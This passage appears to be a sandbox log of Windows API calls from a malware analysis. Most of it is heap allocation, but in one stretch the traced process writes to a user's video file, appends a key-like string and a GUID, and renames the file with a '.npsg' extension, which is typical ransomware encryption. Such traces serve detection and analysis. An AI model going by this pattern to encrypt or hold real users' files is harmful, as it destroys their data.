RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b78 [0238.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b90 [0238.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b60 [0238.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400bf0 [0238.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bc0 [0238.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ba8 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c08 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ba8 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bc0 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b78 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b78 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bd8 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c08 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0238.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b78 | out: hHeap=0x620000) returned 1 [0238.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bf0 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b90 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b60 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86120 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.701] WriteFile (in: hFile=0x644, lpBuffer=0x3b88cd0*, nNumberOfBytesToWrite=0x263f, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b88cd0*, lpNumberOfBytesWritten=0x39afb14*=0x263f, lpOverlapped=0x0) returned 1 [0238.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.702] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2644, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.702] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0238.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b88cd0 [0238.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0238.702] WriteFile (in: hFile=0x644, lpBuffer=0x3b88cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b88cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.702] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.702] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.702] CloseHandle (hObject=0x644) returned 1 [0238.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0238.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b88cd0 [0238.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0238.704] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\Wp1we_L6jDY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\wp1we_l6jdy.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\Wp1we_L6jDY.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\wp1we_l6jdy.mkv.npsg")) returned 1 [0238.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.705] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0238.706] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23e8ab00, ftCreationTime.dwHighDateTime=0x1d5c19b, ftLastAccessTime.dwLowDateTime=0x3d8fb780, ftLastAccessTime.dwHighDateTime=0x1d5ba4b, ftLastWriteTime.dwLowDateTime=0x3d8fb780, ftLastWriteTime.dwHighDateTime=0x1d5ba4b, nFileSizeHigh=0x0, nFileSizeLow=0x2644, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wp1we_L6jDY.mkv", cAlternateFileName="WP1WE_~1.MKV")) returned 0 [0238.706] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0238.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0238.706] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0238.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0238.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cf80 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cfe8 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cf18 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7c0 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fb08 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fb80 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fbf8 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fc70 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cb70 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fce8 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fd60 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a5d8 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fdd8 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fe50 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c43c0 | out: hHeap=0x620000) returned 1 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0238.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c43c0 [0238.707] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.711] HeapFree (in: hHeap=0x620000, 